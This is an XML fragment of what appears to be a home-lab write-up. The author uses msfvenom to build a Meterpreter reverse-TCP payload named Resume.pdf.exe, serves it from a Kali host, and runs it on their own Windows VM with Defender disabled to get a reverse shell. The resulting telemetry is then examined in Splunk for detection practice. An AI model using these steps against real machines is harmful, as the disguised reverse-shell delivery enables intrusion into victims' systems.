          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -l payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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96353" cy="3536767"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47" name="image61.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image61.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:srcRect b="36891" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5296353" cy="353676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show me all the payloads allowed.</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29050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="41" name="image63.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image63.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:srcRect b="36891" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="57340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went ahead and used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/x64/meterpreter_reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which will allow us to connect back to the attacker and spawn a Meterpreter shell; so I ran:</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949861"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60" name="image57.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image57.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:srcRect b="35507" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="394986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command will basically create our malware using meterpreter reverse tcp payload which will connect back to our machine based on lhost and lport, the format will be an exe and the name will be Resume.pdf.exe.</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ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to make sure our file exists and then ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file Resume.pdf.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see what type of file that is.</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3463" cy="3490913"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59" name="image62.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image62.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:srcRect b="36472" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="516346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After this I opened a handler using metasploit which will listen in the port I configured for the malware; for this I ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/handler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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729163" cy="3196133"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="34" name="image33.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image33.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:srcRect b="36463" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4729163" cy="319613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16511"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17" name="image13.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image13.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:srcRect b="37098" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="381651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ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">options </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to see what I could configure.</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48100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="33" name="image46.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image46.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:srcRect b="36577"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noticed that the payload is configured to generic/shell_reverse_tcp so I went ahead and ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set payload windows/x64/meterpreter_reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to change it to my desired option.</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ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> again to make sure it was changed and, it was changed.</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18018"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58" name="image53.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image53.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:srcRect b="37368" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="381801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 focused on lhost and set it to my host, in this case my Kali machine, I ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set lhost 192.168.20.11</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to make sure it was properly changed.</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733800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62" name="image58.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image58.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:srcRect b="38750" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734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changes I started my handler my running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and as soon as that, i was listening into my Windows VM</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3372182"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="25" name="image37.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image37.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:srcRect b="37886" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5100638" cy="337218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set up a HTTP server on my Kali machine so my victim can download the malware, I did so by using Python3 by running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 9999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888" cy="3504203"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="28" name="image34.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image34.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:srcRect b="36562" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5195888" cy="350420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part of this project I shifted over to my Windows machine and disabled Windows Defender so I am able to download and execute my malware.</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searched for 192.168.20.11:9999 and found my malware there, I downloaded it and clicked on keep so it can be downloaded even though it contains malware.</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2913" cy="3191859"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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252913" cy="319185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8175" cy="3524250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4" name="image8.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:srcRect b="18141" l="0" r="22425" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="44481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happens if I try to open it, I clicked Run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4305300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="20"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opened Command Prompt and ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -anob</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see if there is an established connection to my Kali machine and there was.</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41589"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:srcRect b="15652" l="0" r="0" t="14493"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="384158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it is an established connection to 192.168.20.11 on port 4444 with a process ID of 4492; I opened Task Manager and went into details and searched for the same process ID to find out if it was running and it was.</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3486150"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="29" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:srcRect b="14090" l="0" r="0" t="14285"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="51339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 went into Kali and I had an open connection, I ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to establish a shell on my test machine, then I ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">net 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net localgroup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as well as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ipconfig</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778411"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="23" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:srcRect b="38498" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="377841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19525"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="48" name="image51.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image51.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:srcRect b="37441" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="57340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800475"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61" name="image60.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image60.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:srcRect b="37656" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="573405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went into Splunk to see what type of telemetry was generated.</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Splunk I went into Settings, clicked on indexes and clicked on New Index in order to create a new index called endpoint so my Sysmon logs can be injected into Splunk.</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4091280"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63" name="image56.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image56.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:srcRect b="5448" l="0" r="0" t="14938"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5434013" cy="40912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8288" cy="3953468"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49" name="image59.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image59.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:srcRect b="5711" l="0" r="0" t="15242"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5348288" cy="395346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8763" cy="3977523"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53" name="image55.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image55.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:srcRect b="5506" l="0" r="0" t="14742"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5338763" cy="397752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clicked on Apps and went into Search &amp; Reporting</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0"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="31"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To double-check data has been ingested in Splunk I made a search for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index=endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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043488" cy="3771338"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8"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043488" cy="37713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confirming data was properly ingested I made a query for my Kali IP address 192.168.20.11 </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3886928"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10"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176838" cy="388692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873" cy="3885847"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="45"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186873" cy="388584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were analysing these logs, this would be something important to look at and analyse:</w:t>
      </w:r>
    </w:p>
